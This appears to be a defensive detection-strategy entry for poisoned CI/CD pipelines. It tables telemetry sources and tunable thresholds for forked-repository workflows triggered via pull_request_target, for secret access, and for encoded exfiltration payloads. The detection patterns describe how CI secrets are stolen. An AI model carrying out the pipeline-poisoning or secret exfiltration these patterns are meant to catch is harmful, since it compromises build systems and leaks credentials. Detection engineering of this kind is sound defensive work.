Detects anomalous CI/CD workflow execution originating from forked repositories, with pull request (PR) metadata or commit messages containing suspicious patterns (e.g., encoded payloads), coupled with the use of insecure pipeline triggers like pull_request_target or excessive API usage of CI/CD secrets. Correlation with unusual artifact generation or secret exfiltration via encoded or external network destination URLs confirms suspicious behavior.
| Data Component | Name | Channel |
|---|---|---|
| Cloud Service Modification (DC0069) | saas:github | Workflow triggered via pull_request_target from forked repo |
| Cloud Service Metadata (DC0070) | saas:github | CI/CD secret accessed or exported |
| Cloud Storage Access (DC0025) | saas:github | Artifact generated includes base64/encoded exfil payload or URL |
| File Metadata (DC0059) | saas:RepoEvents | New file added or modified in PR targeting CI/CD or build config (e.g., `gitlab-ci.yml`, `build.gradle`, `pom.xml`, `.github/workflows/*.yml`) |
| Command Execution (DC0064) | saas:PRMetadata | Commit message or branch name contains encoded strings or payload indicators |
| Field | Description |
|---|---|
| TimeWindow | Time delta between PR creation and workflow execution to flag rapid attempts |
| UserContext | Forked or external user accounts triggering workflows; may differ across orgs |
| TriggerTypeAllowlist | CI trigger types (e.g., `pull_request_target`) that should or shouldn't be used for forks |
| ArtifactEntropyThreshold | Entropy threshold for detecting encoded payloads in artifacts |
| SecretAccessRateThreshold | Rate of secret access in a single workflow run that might indicate abuse |